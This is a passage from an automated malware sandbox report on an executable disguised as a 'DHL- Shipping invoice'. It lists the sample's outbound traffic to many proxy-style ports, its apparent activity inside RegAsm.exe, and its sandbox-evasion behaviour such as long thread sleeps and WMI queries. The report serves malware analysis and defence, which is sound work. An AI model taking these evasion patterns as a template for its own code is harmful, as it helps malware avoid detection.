                Source: unknownNetwork traffic detected: HTTP traffic on port 51170 -> 55806
                Source: unknownNetwork traffic detected: HTTP traffic on port 50973 -> 6045
                Source: unknownNetwork traffic detected: HTTP traffic on port 51624 -> 32251
                Source: unknownNetwork traffic detected: HTTP traffic on port 51609 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51828 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51131 -> 8989
                Source: unknownNetwork traffic detected: HTTP traffic on port 51151 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51878 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50097
                Source: unknownNetwork traffic detected: HTTP traffic on port 51822 -> 3389
                Source: unknownNetwork traffic detected: HTTP traffic on port 51940 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51855 -> 2324
                Source: unknownNetwork traffic detected: HTTP traffic on port 51932 -> 51511
                Source: unknownNetwork traffic detected: HTTP traffic on port 51222 -> 4228
                Source: unknownNetwork traffic detected: HTTP traffic on port 51791 -> 50554
                Source: unknownNetwork traffic detected: HTTP traffic on port 51788 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51122 -> 45725
                Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 62310
                Source: unknownNetwork traffic detected: HTTP traffic on port 51591 -> 32210
                Source: unknownNetwork traffic detected: HTTP traffic on port 65533 -> 51558
                Source: unknownNetwork traffic detected: HTTP traffic on port 51863 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51045 -> 21605
                Source: unknownNetwork traffic detected: HTTP traffic on port 51268 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51881 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51980 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51977 -> 31654
                Source: unknownNetwork traffic detected: HTTP traffic on port 51286 -> 55361
                Source: unknownNetwork traffic detected: HTTP traffic on port 51982 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51986 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51987 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51457 -> 9999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51942 -> 8193
                Source: unknownNetwork traffic detected: HTTP traffic on port 4228 -> 51222
                Source: unknownNetwork traffic detected: HTTP traffic on port 51568 -> 6004
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49980
                Source: unknownNetwork traffic detected: HTTP traffic on port 51681 -> 48298
                Source: unknownNetwork traffic detected: HTTP traffic on port 50900 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51153 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51621 -> 34409
                Source: unknownNetwork traffic detected: HTTP traffic on port 51631 -> 29380
                Source: unknownNetwork traffic detected: HTTP traffic on port 51671 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 33268
                Source: unknownNetwork traffic detected: HTTP traffic on port 51125 -> 47460
                Source: unknownNetwork traffic detected: HTTP traffic on port 52003 -> 10011
                Source: unknownNetwork traffic detected: HTTP traffic on port 51147 -> 53281
                Source: unknownNetwork traffic detected: HTTP traffic on port 51858 -> 6969
                Source: unknownNetwork traffic detected: HTTP traffic on port 51953 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51930 -> 8002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51243 -> 16487
                Source: unknownNetwork traffic detected: HTTP traffic on port 51169 -> 4893
                Source: unknownNetwork traffic detected: HTTP traffic on port 52011 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51979 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51245 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 51976 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51356 -> 48962
                Source: unknownNetwork traffic detected: HTTP traffic on port 52022 -> 27391
                Source: unknownNetwork traffic detected: HTTP traffic on port 51446 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 33082
                Source: unknownNetwork traffic detected: HTTP traffic on port 51967 -> 36181
                Source: unknownNetwork traffic detected: HTTP traffic on port 52069 -> 4145
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeMemory allocated: 1B9F1D20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeMemory allocated: 1B9F3650000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 28A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 48A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199794Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199436Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199218Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198483Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198220Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197501Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197116Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 1197015Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeWindow / User API: threadDelayed 5966Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 6201Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 3577Jump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -99890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -99779s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -99671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -99561s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exe TID: 7060Thread sleep time: -99452s >= -30000sJump to behavior
